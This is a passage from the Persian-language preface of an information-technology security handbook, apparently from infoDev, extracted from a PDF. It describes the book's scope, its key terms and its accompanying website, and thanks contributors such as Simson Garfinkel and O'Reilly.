ﻛﻠﻴﺪﻱ ﺳـﺎﺯﻣﺎﻥ ﻫﻤﭽﻨـﺎﻥ ﺑﺘﻮﺍﻧـﺪ ﭘﺎﺑﺮﺟـﺎ ﺑﻤﺎﻧـﺪ؟ ﻛـﺸﻮﺭﻫﺎﻱ
ﻲ ﺁﻣـﻮﺯﺵﺩﻳـﺪﻩ ﻭ
ﺩﺭﺣﺎﻝ ﺗﻮﺳـﻌﻪ ﺑﺎﻳـﺪ ﻇﺮﻓﻴـﺖ ﻣﻨـﺎﺑﻊ ﺍﻧـﺴﺎﻧ ﹺ
ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﻓﻨﺎﻭﺭﻱ ﺧﻮﺩ ﺭﺍ ﺑﻬﺒﻮﺩ ﺑﺨﺸﻨﺪ ﺗـﺎ ﺍﻫـﺪﺍﻑ ﺁﺳـﺎﻧﻲ
ﺑﺮﺍﻱ ﺣﻤﻠﺔ ﺗﺒﻬﻜﺎﺭﺍﻥ ﻓﻀﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻧﺒﺎﺷـﻨﺪ .ﺩﺭ ﺍﻳـﻦ ﻛﺘـﺎﺏ
ﺑﺤﺜﻬﺎﻱ ﺑﺴﻴﺎﺭﻱ ﺩﺭﺑﺎﺭﺓ ﻣﺎﻫﻴﺖ ﻣﻮﺿـﻮﻉ ﺍﻣﻨﻴـﺖ ﻣﻄـﺮﺡ ﺷـﺪﻩ
ﺍﺳﺖ؛ ﭼﺮﺍﻛﻪ ﺩﺭ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺑﻪ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺩﻳﺪﮔﺎﻩﻫﺎﻱ ﻣﺘﻔﺎﻭﺗﻲ
ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺩﺭ ﻣﻮﺭﺩ ﺩﺍﺩﻩﻫﺎ ﻧﮕﺮﺍﻧﻲ ﺩﺍﺭﻧـﺪ ﺑـﻪ ﺍﻳـﻦ
ﻣــﺴﺌﻠﻪ ﺑﻌﻨــﻮﺍﻥ ﻳــﻚ ﻣﻮﺿــﻮﻉ ﺩﺭ ﺣــﻮﺯﺓ ﺍﻣﻨﻴــﺖ ﺍﻃﻼﻋــﺎﺕ
ﻲ ﺫﺧﻴـﺮﻩ ﻭ ﺍﺭﺳـﺎﻝ
ﻣﻲﻧﮕﺮﻧﺪ؛ ﻛـﺴﺎﻧﻴﻜﻪ ﺑـﺎ ﻣﻜﺎﻧﻴﺰﻣﻬـﺎﻱ ﻓﻨـ ﹺ
ﺍﻃﻼﻋﺎﺕ ﺳﺮ ﻭ ﻛﺎﺭ ﺩﺍﺭﻧﺪ ﺍﻳﻦ ﻣﺒﺤﺚ ﺭﺍ ﺍﺯ ﺩﻳﺪ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢ ﻭ
ﺷﺒﻜﻪ ﻣﻲ ﺑﻴﻨﻨﺪ؛ ﺣﺎﻝ ﺁﻧﻜﻪ ﺩﻳﮕﺮﺍﻧﻲ ﻛـﻪ ﺑـﻪ ﺗﺠـﺎﺭﺕ ﻣـﺸﻐﻮﻝ
ﻫﺴﺘﻨﺪ ﺑﻪ ﺁﻥ ﺑﻌﻨﻮﺍﻥ ﻳـﻚ ﺣـﻮﺯﺓ ﺟﺪﻳـﺪ ﺩﺭ ﺗﺠـﺎﺭﺕ ﻭ ﻋﻤﻮﻣـﹰﺎ
ﺗﺤﺖ ﻋﻨﻮﺍﻥ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﮕﺎﻩ ﻣﻲﻛﻨﻨﺪ.
ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺍﻳﻦ ﻣﺴﺎﺋﻞ ﻣﺎ ﺗﺮﺟﻴﺢ ﺩﺍﺩﻩﺍﻳﻢ ﺗﻤﺎﻡ ﻣﺒـﺎﺣﺜﻲ ﻛـﻪ ﺩﺭ
ﻣﻘﻮﻟﻪ "ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ" ﻣﻲﮔﻨﺠـﺪ ﺭﺍ ﺍﺭﺍﺋـﻪ ﻛﻨـﻴﻢ ﻭ ﺍﺯ
ﺍﻳﻦ ﻃﺮﻳﻖ ﺑﻪ ﺗﻤﺎﻣﻲ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺫﺧﻴﺮﻩ ﻭ ﭘـﺮﺩﺍﺯﺵ ﻭ ﺍﺭﺳـﺎﻝ
ﺍﻃﻼﻋﺎﺕ ،ﺳﺨﺖﺍﻓﺰﺍﺭ ،ﻧﺮﻡﺍﻓﺰﺍﺭ ،ﻭ ﺗﺴﻬﻴﻞ ﺍﺭﺗﺒﺎﻃـﺎﺕ ،ﺑـﺎ ﻳـﻚ
ﻧﮕﺎﻩ ﻭﻳﮋﻩ ﺑﻪ ﻣﺴﺌﻠﻪ ﺍﻣﻨﻴﺖ ﺧﻮﺩ ﺍﻃﻼﻋﺎﺕ ﺑﭙﺮﺩﺍﺯﻳﻢ .ﺍﻳﻦ ﻣﺴﺌﻠﻪ
١٦
ﺣﺎﺋﺰ ﺍﻫﻤﻴـﺖ ﺍﺳـﺖ ﻛـﻪ ﻫـﻢ ﺍﻃﻼﻋـﺎﺕ ﻭ ﻫـﻢ ﻣﻜﺎﻧﻴﺰﻣﻬـﺎﻱ
ﭘﺮﺩﺍﺯﺵ ﺁﻥ ﺑﺎﻳﺪ ﺍﺯ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻣﺼﻮﻥ ﺑﺎﺷﻨﺪ.
ﻣﺎ ﺗﻌﻤﺪﹰﺍ ﺩﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﺗﻮﺟﻪ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎ ،ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎ ﻭ
ﺷﺒﻜﻪﻫﺎ ﻣﺤﺪﻭﺩ ﻛﺮﺩﻩﺍﻳﻢ؛ ﭼﺮﺍﻛﻪ ﻣﻨﺎﺑﻊ ﻏﻨﻲ ﻭ ﻣﺘﻌـﺪﺩﻱ ﺑـﺮﺍﻱ
ﺁﮔﺎﻫﻲ ﺍﺯ ﺟﺰﺋﻴﺎﺕ ﻣﺴﺎﺋﻞ ﺩﻳﮕﺮ ﻧﻈﻴﺮ ﺗﻠﻔﻦ ﺛﺎﺑﺖ ﻭ ﻫﻤﺮﺍﻩ ﻛﻪ ﺩﺭ
ﺍﺭﺗﺒﺎﻁ ﺗﻨﮕﺎﺗﻨﮓ ﺑﺎ ﺍﻳـﻦ ﻣـﺴﺎﺋﻞ ﻫـﺴﺘﻨﺪ ﻭ ﺩﺭ ﺍﻳﻨﺠـﺎ ﺑـﻪ ﺁﻧﻬـﺎ
ﭘﺮﺩﺍﺧﺘﻪ ﻧﺸﺪﻩ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺑﺎ ﻧﺰﺩﻳﻜﺘﺮ ﺷﺪﻥ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺗﻠﻔﻨـﻲ ﻭ
ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﻪ ﻳﻜﺪﻳﮕﺮ ،ﭼﻨﻴﻦ ﻣﺴﺎﺋﻠﻲ ﻧﻴﺰ ﺍﻫﻤﻴﺖ ﺑﻴـﺸﺘﺮﻱ ﭘﻴـﺪﺍ
ﻣــﻲﻛﻨﻨــﺪ .ﺑــﺎ ﭘﻴــﺪﺍﻳﺶ Voice over IPﻭ ،ENUM
ﭘﺮﻭﺗﻜﻠﻬﺎﻱ ﺗﻠﻔﻦ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻧﻴﺰ ﻛﺎﺭﺑﺮﺩ ﺭﻭﺯﺍﻓﺰﻭﻧﻲ ﻣﻲﻳﺎﺑﻨﺪ ﻭ ﺑـﺎ
ﭘﻴﺪﺍﻳﺶ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ 3Gﺑﺘﺪﺭﻳﺞ ﺑﻪ ﻣـﺴﺎﺋﻠﻲ ﭼـﻮﻥ ﺍﻣﻨﻴـﺖ ﺩﺭ
ﺁﻧﻬﺎ ﻧﻴﺰ ﺑﺎﻳﺪ ﺗﻮﺟﻪ ﻛﺮﺩ.
ﺍﻳﻦ ﻛﺘﺎﺏ ﺑـﻪ ﻧﺤـﻮﻱ ﺗـﺪﻭﻳﻦ ﺷـﺪﻩ ﻛـﻪ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ
ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻧﻴﺰ ﺑﺎ ﻫﺰﻳﻨﻪﺍﻱ ﺍﻧﺪﻙ ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﺎﺷﺪ .ﻫﺪﻑ ﺍﺯ
ﺍﻧﺘﺸﺎﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﺍﻳﻦ ﻧﻴﺴﺖ ﻛﻪ ﺑﻪ ﺗﻴـﺮﺍﮊ ﺑـﺎﻻﻳﻲ ﺍﺯ ﺁﻥ ﺩﺳـﺖ
ﻳﺎﺑﻴﻢ ،ﺑﻠﻜﻪ ﺑﻨﺎ ﺑﺮ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻣﻔﺎﺩ ﻛﺘﺎﺏ ﺩﺭ ﻳﻚ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ
ﺟﻬﺎﻧﻲ ﺍﺭﺍﺋﻪ ﮔﺮﺩﺩ ﻛﻪ ﺍﺯ ﺩﻭ ﻟﺤﺎﻅ ﭘﻮﻳﺎ ﺑﺎﺷﺪ :ﺍﻭﻝ ﺍﻳﻨﻜﻪ ﻣﻄﺎﻟﺐ
ﺁﻥ ﺗﺎ ﺣﺪ ﺍﻣﻜﺎﻥ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲﺷﺪﻩ ﺑﺎﺷﺪ ،ﻭ ﺩﻭﻡ ﺍﻳﻨﻜﻪ ﺍﻃﻼﻋـﺎﺕ
ﻣﻔﻴﺪ ﻭ ﻣﻨﺎﺳﺒﻲ ﺑﻪ ﺧﻮﺍﻧﻨﺪﮔﺎﻧﻲ ﻛـﻪ ﺑـﺪﻧﺒﺎﻝ ﻛـﺴﺐ ﺍﻃﻼﻋـﺎﺗﻲ
ﺩﺭﺑﺎﺭﺓ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻫﺴﺘﻨﺪ ﺍﺭﺍﺋﻪ ﻛﻨﺪ.
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺧﻮﺍﻧﻨﺪﻩ ﺑﺎﻳﺪ ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﻣﺆﻟﻔﻴﻦ ﺑﺮﺍﻱ ﻣﻘﻮﻟﺔ ﺍﻣﻨﻴﺖ ﻭ
ﺭﺍﻳﺎﻧﻪ ﺍﺯ ﺍﺻﻄﻼﺣﺎﺕ ﻣﺨﺘﻠﻔﻲ ﺍﺳـﺘﻔﺎﺩﻩ ﻛـﺮﺩﻩﺍﻧـﺪ .ﺑﻄـﻮﺭ ﻛﻠـﻲ
ﻣﻘﻮﻟﺔ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻪ ﻣﻮﺿﻮﻋﺎﺕ ﺯﻳﺮ ﺍﺷﺎﺭﻩ ﺩﺍﺭﺩ:
(۱ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ :ﺍﻣﻨﻴﺖ ﺍﺯ ﻧﻈﺮ ﻓﻨﻲ ﺩﺭ ﻣﺎﺷﻴﻨﻬﺎ ،ﻧﺮﻡﺍﻓـﺰﺍﺭ،
ﺩﺍﺩﻩﻫﺎ ﻭ ﺷﺒﻜﻪﻫﺎ .ﺍﺯ ﺍﻳﻦ ﺍﺻـﻄﻼﺡ ﺑﻴـﺸﺘﺮ ﺩﺭ ﺑﺨـﺸﻬﺎﻱ
ﺩﻭﻡ ﻭ ﭘــﻨﺠﻢ ﺍﺳــﺘﻔﺎﺩﻩ ﺷــﺪﻩ ﻛــﻪ ﺑﻴــﺸﺘﺮ ﺑــﺮ ﺭﻭﻱ ﺍﺑﻌــﺎﺩ
ﻓﻴﺰﻳﻜﻲ ،ﺯﻳﺮﺳﺎﺧﺘﻲ ﻭ ﻓﻨﻲ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺗﺄﻛﻴﺪ ﺩﺍﺭﻧﺪ.
(۲ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ :١٢ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭﺍﺑـﺴﺘﻪ ﺑـﻪ
ﺳﻴﺎﺳﺖ ﺩﻭﻟﺘﻬﺎ .ﺍﻳﻦ ﺍﺻـﻄﻼﺡ ﻋﻤﻮﻣـﹰﺎ ﺗﻮﺳـﻂ ﻣﺆﺳـﺴﺎﺕ
ﺩﻭﻟﺘﻲ ﻭ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﺍﻥ ﻣﻠﻲ ﺩﺭ ﺍﺳﻨﺎﺩ ،ﻗﻮﺍﻧﻴﻦ ﻭ ﭘﺮﻭﮊﻩﻫﺎﻱ
ﺗﺤﻘﻴﻘﺎﺗﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﺷﻮﺩ ﻭ ﻛﻤﺎﺑﻴﺶ ﻣﺘﺮﺍﺩﻑ ﺑﺎ "ﺍﻣﻨﻴـﺖ
ﺍﻳﻨﺘﺮﻧﺖ" ﺍﺳﺖ )ﺍﺻﻄﻼﺣﻲ ﻛـﻪ ﺩﺭ ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺑـﻪ ﺁﻥ ﺍﺷـﺎﺭﻩ ﺍﻱ
ﻧﺸﺪﻩ ،ﺍﻣﺎ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺩﺭ ﻣﺮﺍﺟﻊ ﺩﻳﮕﺮ ﺑﻪ ﭼﺸﻢ ﻣﻲﺧﻮﺭﺩ( .ﻫـﺮ ﺩﻭ
ﻋﺒﺎﺭﺕ ﺑﻪ ﺟﻮﺍﻧﺐ ﺍﻣﻨﻴﺖ ﺷـﺒﻜﻪ ﻭ ﺍﺻـﻮﻝ ﺳﻴﺎﺳـﺘﮕﺬﺍﺭﻱ
ﺷﺒﻜﻪﻫﺎ ﻣﺜﻞ ﺗﻌﺮﻳـﻒ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ ،ﺟـﺮﺍﺋﻢ ﺳـﺎﻳﺒﺮ،
ﺗﺠﺎﺭﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺟﻬﺎﻧﻲ ﺍﺷﺎﺭﻩ ﺩﺍﺭﻧـﺪ .ﺗﻔـﺎﻭﺕ ﺍﻳـﻦ ﺩﻭ
ﺍﺻــﻄﻼﺡ ﭼﻨــﺪﺍﻥ ﺯﻳــﺎﺩ ﻧﻴــﺴﺖ؛ ﺑﻠﻜــﻪ ﻫﻤــﺎﻧﻄﻮﺭ ﻛــﻪ ﺩﺭ
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻓﺼﻠﻬﺎﻱ ﺍﻳﻦ ﻛﺘـﺎﺏ ﻣـﻲ ﺗـﻮﺍﻥ ﺩﻳـﺪ ،ﺍﻣﻨﻴـﺖ
ﺭﺍﻳﺎﻧﻪ ﻫﺎ ،ﺷﺒﻜﻪ ﻫﺎ ﻭ ﺩﺍﺩﻩﻫـﺎ ﺗـﺎ ﺣـﺪ ﺯﻳـﺎﺩﻱ ﺑـﺎ ﻣﻔـﺎﻫﻴﻢ
ﺭﻭﺯﻣﺮﺓ ﺍﻣﻨﻴﺖ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺑﻪ ﻫﻢ ﮔﺮﻩ ﺧﻮﺭﺩﻩﺍﻧﺪ.
ﻣﻄﺎﻟﺐ ﺍﻳﻦ ﻛﺘﺎﺏ ﺑﻪ ﭘـﻨﺞ ﺑﺨـﺶ ﻣﺨﺘﻠـﻒ ﺗﻘـﺴﻴﻢ ﺷـﺪﻩ ﻛـﻪ
ﻫﺮﻳﻚ ﻣﻨﺎﺳﺐ ﮔﺮﻭﻩ ﺧﺎﺻﻲ ﺍﺯ ﺧﻮﺍﻧﻨﺪﮔﺎﻥ ﻫﺴﺘﻨﺪ .ﻻﺯﻡ ﺑﻪ ﺫﻛﺮ
ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺑﺨﺸﻬﺎﻱ ﻣﺨﺘﻠﻒ ﻛﺘﺎﺏ ﮔﺎﻫﻲ ﻣـﻲﺗـﻮﺍﻥ ﻣﻄﺎﻟـﺐ
ﻣﺸﺘﺮﻙ ﻭ ﺗﻜﺮﺍﺭﻱ ﭘﻴـﺪﺍ ﻛـﺮﺩ ،ﭼﺮﺍﻛـﻪ ﺑـﺎ ﺍﻳﻨﻜـﺎﺭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ
ﺧﻮﺍﻧﻨﺪﮔﺎﻥ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺗﻨﻬﺎ ﺑﺨـﺸﻲ ﺍﺯ ﻛﺘـﺎﺏ ﺭﺍ ﺑـﺮﺍﻱ ﺧﻮﺍﻧـﺪﻥ
ﺍﻧﺘﺨﺎﺏ ﻛﻨﻨﺪ ﻛﻪ ﺑﻪ ﻛﺎﺭ ﺁﻧﻬﺎ ﻣﻲﺁﻳﺪ .ﺑﻌﻀﻲ ﺑﺨﺸﻬﺎ -ﺧـﺼﻮﺻﹰﺎ
ﺁﻧﻬﺎﻳﻲ ﻛﻪ ﺑﻪ ﺗﺸﺮﻳﺢ ﺍﻣﻨﻴﺖ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣـﻲﭘﺮﺩﺍﺯﻧـﺪ -
ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﻄﻮﺭ ﻣﺴﺘﻘﻞ ﻣﻨﺘﺸﺮ ﻭ ﻣﻴﺎﻥ ﻛﺎﺭﺑﺮﺍﻧﻲ ﻛـﻪ ﺑـﻪ ﺁﻧﻬـﺎ
ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ ﺗﻮﺯﻳﻊ ﻧﻤﻮﺩ.
ﺩﺭ ﺩﻧﻴـﺎﻱ ﺳﺮﻳﻊ ﻭ ﺩﺭﺣـﺎﻝ ﭘﻴـﺸـﺮﻓﺖ ﺍﻣـﺮﻭﺯ ،ﺗـﺪﻭﻳﻦ ﮐﺘـﺎﺏ
ﺭﺍﻫﻨﻤﺎ ﺩﺭ ﻣﻌﺮﺽ ﺍﻳﻦ ﺧﻄﺮ ﺍﺳﺖ ﻛﻪ ﺍﻧﺪﻛﻲ ﭘـﺲ ﺍﺯ ﺍﻧﺘـﺸﺎﺭ ﺍﺯ
ﺭﺩﻩ ﺧﺎﺭﺝ ﻭ ﻗﺪﻳﻤﻲ ﺷﻮﺩ .ﺑﺮﺍﻱ ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺷﺘﻦ ﻣﺤﺘﻮﻳﺎﺕ ﺍﻳﻦ
ﻛﺘــﺎﺏ ﺗﻤــﺎﻣﻲ ﺑﺨــﺸﻬﺎﻱ ﺁﻥ ﺩﺭ ﻳــﻚ ﭘﺎﻳﮕــﺎﻩ ﻭﺏ ﺑــﻪ ﺁﺩﺭﺱ
www.infodev-security.netﻣﻮﺟﻮﺩ ﻫﺴﺘﻨﺪ ﺗﺎ ﻫﺮﻳﻚ ﺭﺍ
ﺑﺘﻮﺍﻥ ﺩﺭ ﺁﻳﻨﺪﻩ ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ ﻧﻤﻮﺩ .ﺧﻮﺍﻧﻨـﺪﮔﺎﻧﻲ ﻛـﻪ ﻣﺎﻳـﻞ ﺑـﻪ
ﺍﺿﺎﻓﻪ ﻛﺮﺩﻥ ﻣﻄﺎﻟﺐ ﻣﻔﻴﺪ ﺩﺭ ﺑﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺑﺎﺷـﻨﺪ
ﻣــﻲﺗﻮﺍﻧﻨــﺪ ﭘﻴــﺸﻨﻬﺎﺩﺍﺕ ﺧــﻮﺩ ﺭﺍ ﺑــﻪ ﺁﺩﺭﺱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ
contact@infodev-security.netﺍﺭﺳﺎﻝ ﻧﻤﺎﻳﻨﺪ.
ﺩﺭ ﺗﻬﻴﻪ ﻭ ﺗﺪﻭﻳﻦ ﺍﻳﻦ ﻛﺘﺎﺏ ﻧﺎﭼﺎﺭ ﺑﻪ ﺍﻳﺠﺎﺩ ﺗﻮﺍﺯﻥ ﻣﻴﺎﻥ ﺍﺻـﻮﻝ
ﻛﻠﻲ ،ﻧﻤﻮﻧﻪﻫﺎﻱ ﻭﻳﮋﻩ ،ﻭ ﺍﻃﻼﻋﺎﺕ ﻋﻤﻠﻲ ﺑﻮﺩﻩﺍﻳﻢ ﻭ ﺍﻣﻴـﺪﻭﺍﺭﻳﻢ
ﻛﻪ ﺗﻮﺍﺯﻥ ﺍﻳﺠﺎﺩﺷﺪﻩ ﺍﺯ ﺗﻨﺎﺳﺐ ﻻﺯﻡ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺑﺎﺷﺪ .ﺍﮔﺮﭼـﻪ ﺑـﺎ
ﭘﻴﺸﺮﻓﺖ ﻭ ﺗﻜﺎﻣﻞ ﻓﻨﺎﻭﺭﻱ ،ﺟﺰﺋﻴﺎﺕ ﻓﻨﻲ ﻧﻴﺰ ﺗﻐﻴﻴﺮ ﺧﻮﺍﻫﻨﺪ ﻛﺮﺩ،
ﺍﻣﺎ ﺍﻳﻦ ﺍﺻﻮﻝ ﻫﻤﻮﺍﺭﻩ ﺛﺎﺑﺖ ﺧﻮﺍﻫﻨﺪ ﺑـﻮﺩ ﻭ ﺧﻮﺍﻧﻨـﺪﮔﺎﻥ ﺍﺯ ﻧﻈـﺮ
ﺳﻴﺎﺳﺖ ﻭ ﻣﺪﻳﺮﻳﺖ ﻭ ﻫﻤﭽﻨﻴﻦ ﺍﺯ ﻧﻈﺮ ﻓﻨﻲ ﻗﺎﺩﺭ ﺑﻪ ﻓﻬﻢ ﺁﺳـﺎﻥ
ﺁﻧﻬﺎ ﻣـﻲﺑﺎﺷـﻨﺪ .ﺍﮔـﺮ ﺍﻳـﻦ ﺍﺻـﻮﻝ ﺑـﺪﻗﺖ ﺩﺭﻙ ﺷـﻮﻧﺪ ﺁﻧﮕـﺎﻩ
ﺭﺍﻩﺣﻠﻬﺎﻱ ﻓﻨﻲ ﺑﺴﺎﺩﮔﻲ ﺩﺭ ﺩﺳﺘﺮﺱ ﻗﺮﺍﺭ ﺧﻮﺍﻫﻨﺪ ﮔﺮﻓﺖ.
ﺗﺪﻭﻳﻦ ﺍﻳﻦ ﻛﺘﺎﺏ ﺑﺪﻭﻥ ﺣﻤﺎﻳﺖ ﺗﻌـﺪﺍﺩﻱ ﺍﺯ ﺍﻓـﺮﺍﺩ ﻭ ﻣﺆﺳـﺴﺎﺕ
ﻭﻳــﮋﻩ ﻭ ﻣﻬــﻢ ﻫﻴﭽﮕــﺎﻩ ﻣﻤﻜــﻦ ﻧﺒــﻮﺩ ،ﺍﺯ ﺟﻤﻠــﻪ ﺳﻴﻤــﺴﻮﻥ
ﮔﺎﺭﻓﻴﻨﻜﻞ ،١٣ﻛﻪ ﺭﺍﻫﻨﻤﺎﻳﻴﻬﺎﻱ ﻣﻬﻤﻲ ﺩﺭ ﺗﺪﻭﻳﻦ ﺳـﺎﺧﺘﺎﺭ ﺍﻭﻟﻴـﺔ
ﺍﻳﻦ ﻛﺘﺎﺏ ﻧﻤﻮﺩ ﻭ ﭘﺲ ﺍﺯ ﺁﻥ ﺩﺭ ﺷﻨﺎﺳـﺎﻳﻲ ﻭ ﻫﻤﺎﻫﻨـﮓﺳـﺎﺯﻱ
ﻗﺴﻤﺘﻲ ﺍﺯ ﺗﻴﻢ ﺗﻬﻴﻪﻛﻨﻨﺪﮔﺎﻥ ﻛﺘﺎﺏ ﻛﻤـﻚ ﻛـﺮﺩ .ﺍﻧﺘـﺸﺎﺭ ﺍﻳـﻦ
Cyber-Security
Simson Garfinkel
12
13
١٧
ﭘﻴﺶﺩﺭﺁﻣﺪ
ﻛﺘﺎﺏ ﺭﺍﻫﻨﻤﺎ ﺑﺪﻭﻥ ﺭﺍﻫﻨﻤﺎﻳﻲ ﻭ ﻛﻤﻚ ﺍﻭ ﻣﻴﺴﺮ ﻧﻤﻲﺷﺪ .ﺑﺮﻭﻧـﻮ
ﻟﻨﻮﻳﻦ ،١٤ﻣﺪﻳﺮ infoDevﻛﻪ ﺍﻋﺘﺒـﺎﺭﺍﺕ ﺯﻳـﺎﺩﻱ ﺑـﺮﺍﻱ ﺗﻔﻬـﻴﻢ
ﻣﻨﺎﺳﺒﺖ ﻭ ﻗﺪﺭﺕ ﺧﻠﻖ ﺍﻃﻼﻋﺎﺕ ﻭ ﺗﻮﺯﻳﻊ ﺁﻥ ﺩﺭ ﺯﻣﻴﻨﺔ ﻓﻨـﺎﻭﺭﻱ
ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺩ؛ ﻫﻤﭽﻨﻴﻦ ﮊﺍﻛﻠﻴﻦ ﺩﻭﺑـﻮ،١٥
ﺍﻟﻲ ﺍﻟﻮﻱ ،١٦ﺗﺮﻱ ﻧﺎﻛﺎﺯﻝ ١٧ﻭ ﻫﺮﻳﺮﻱ ﺑﺮﺗـﺎﺩﻭ ١٨ﻛـﻪ ﻫﻤﮕـﻲ ﺍﺯ
ﻣﺪﻳﺮﺍﻥ infoDevﻫﺴﺘﻨﺪ .ﺍﺯ ﺗـﻴﻢ ﺍﻭﺭﻳﻠـﻲ ﻛـﻪ ﺑـﺎ ﭘـﺸﺘﻴﺒﺎﻧﻲ
ﺷﺮﻛﺖ ﺧﻮﺩ ﺑﻪ ﻧﺎﻡ ﺍﻭﺭﻳﻠﻲ ﻭ ﺷﺮﻛﺎ ١٩ﺩﻭ ﻛﺘـﺎﺏ ﺯﻳـﺮ ﺭﺍ ﻣﻨﺘـﺸﺮ
ﻛﺮﺩﻧﺪ ﻧﻴﺰ ﺗﺸﻜﺮ ﻣﻲﻛﻨﻴﻢ :ﺍﻣﻨﻴﺖ ﺍﻳﻨﺘﺮﻧﺖ ﻭ ﻛﺎﺭﺑﺮﺩ ﻳﻮﻧﻴﻜﺲ،٢٠
ﻭﻳﺮﺍﻳﺶ ﺳﻮﻡ )ﺳﻴﻤﺴﻮﻥ ﮔﺎﺭﻓﻴﻨﻜـﻞ ،ﮊﻥ ﺍﺳـﭙﺎﻓﻮﺭﺩ ٢١ﻭ ﺁﻟـﻦ ﺷـﻮﺍﺭﺗﺰ،٢٢
٢٣
ﭼﺎﭖ (۲۰۰۳ﻭ ﺍﻣﻨﻴـﺖ ﻭﺏ ،ﻣﺤﺮﻣـﺎﻧﮕﻲ ﻭ ﺗﺠـﺎﺭﺕ )ﺳﻴﻤـﺴﻮﻥ
ﮔﺎﺭﻓﻴﻨﻜﻞ ﻭ ﮊﻥ ﺍﺳﭙﺎﻓﻮﺭﺩ ،ﭼﺎﭖ .(۲۰۰۲ﺍﻳـﻦ ﻛﺘﺎﺑﻬـﺎ ﺑـﺮﺍﻱ ﺗﻜﻤﻴـﻞ
ﺑﺨﺸﻬﺎﻱ ﻣﻬﻤـﻲ ﺍﺯ ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺭﺍﻫﻨﻤـﺎ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ
ﮔﺮﻓﺘﻪﺍﻧﺪ ﻭ ﭼﻨﺪ ﺑﺨﺶ ﺁﻧﻬﺎ ﻧﻴﺰ ﺑﺎ ﻛﺴﺐ ﻣﺠﻮﺯ ﺍﺯ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﻭ
ﻧﺎﺷﺮﺍﻥ ﺑﺮﺍﻱ ﭼﺎﭖ ﻣﺠﺪﺩ ﺩﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﺭﺍﻫﻨﻤﺎ ﺑﻜﺎﺭ ﺭﻓﺘﻪﺍﻧﺪ.
ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻨﻬﺎ ﺷﺮﻛﺖ ﺍﻭﺭﻳﻠﻲ ﻭ ﺷﺮﻛﺎ ﺩﺭ ﺩﻩ ﺳﺎﻝ ﺍﺧﻴـﺮ ﺩﻫﻬـﺎ
